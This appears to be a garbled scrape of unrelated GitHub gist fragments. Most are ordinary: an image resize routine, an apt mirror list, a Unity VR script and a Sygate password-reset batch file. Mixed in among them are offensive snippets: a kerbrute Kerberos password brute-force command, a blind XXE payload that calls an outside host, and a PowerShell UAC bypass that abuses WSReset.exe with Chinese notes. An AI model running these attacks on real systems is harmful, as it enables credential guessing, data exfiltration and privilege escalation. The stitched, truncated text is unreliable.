With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
static void Resize(string filepath, int quality = 75, string watermarkpath = @"C:\Users\ddd\Desktop\123\water.png") | |
{ | |
using (var water = File.OpenRead(watermarkpath)) | |
{ | |
SKBitmap waterBitmap = SKBitmap.Decode(water); | |
using (var file = File.OpenRead(filepath)) | |
{ | |
var rawLength = file.Length; | |
if (filepath.EndsWith("gif")) |
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With Rubeus version with brute module:
@echo off | |
setlocal | |
set CATALINA_HOME=%CD%\..\tomcat | |
set JRE_HOME=%CD%\..\jre | |
"%JRE_HOME%\bin\java.exe" -Xms64m -Xmx256m -XX:MinHeapFreeRatio=30 -XX:MaxHeapFreeRatio=40 -classpath "%CD%\..\bin\inst.jar;%CD%\..\bin\inst-res.jar" -Dcatalina.home="%CATALINA_HOME%" -Djava.library.path="%CATALINA_HOME%\bin;%CATALINA_HOME%\..\ASA\win32" com.sygate.scm.tools.DatabaseFrame setpassword admin admin | |
endlocal |
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
deb http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse | |
deb-src http://mirrors.aliyun.com/ubuntu/ focal main restricted universe multiverse | |
deb http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse | |
deb-src http://mirrors.aliyun.com/ubuntu/ focal-security main restricted universe multiverse | |
deb http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse | |
deb-src http://mirrors.aliyun.com/ubuntu/ focal-updates main restricted universe multiverse | |
deb http://mirrors.aliyun.com/ubuntu/ focal-proposed main restricted universe multiverse |
遇到了win10的环境就找了下bypassuac的。
win10 1909 18363.535 Pro
利用微软提供的sigcheck.exe签名检查工具发现 C:\Windows\System32\WSReset.exe
存在autoElevate
属性为true
function Invoke-WSResetBypass { | |
Param ( | |
[String]$Command = "C:\Windows\System32\cmd.exe /c start cmd.exe" | |
) | |
$CommandPath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" | |
$filePath = "HKCU:\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command" | |
New-Item $CommandPath -Force | Out-Null | |
New-ItemProperty -Path $CommandPath -Name "DelegateExecute" -Value "" -Force | Out-Null | |
Set-ItemProperty -Path $CommandPath -Name "(default)" -Value $Command -Force -ErrorAction SilentlyContinue | Out-Null |
import socket | |
import random | |
import argparse | |
import sys | |
from io import BytesIO | |
# Referrer: https://github.com/wuyunfeng/Python-FastCGI-Client | |
PY2 = True if sys.version_info.major == 2 else False |
import requests | |
import re | |
import os | |
from datetime import datetime | |
COUNT = 0 | |
def getimg(post, rule): | |
with open(post, 'r', encoding='utf-8') as f: |
using System.Collections; | |
using System.Collections.Generic; | |
using UnityEngine; | |
using VRStandardAssets.Utils; | |
public class Example : MonoBehaviour { | |
VRInteractiveItem vritem; | |
//动态添加vritem | |
void Awake(){ | |
if (!gameObject.GetComponent <VRInteractiveItem> ()) { |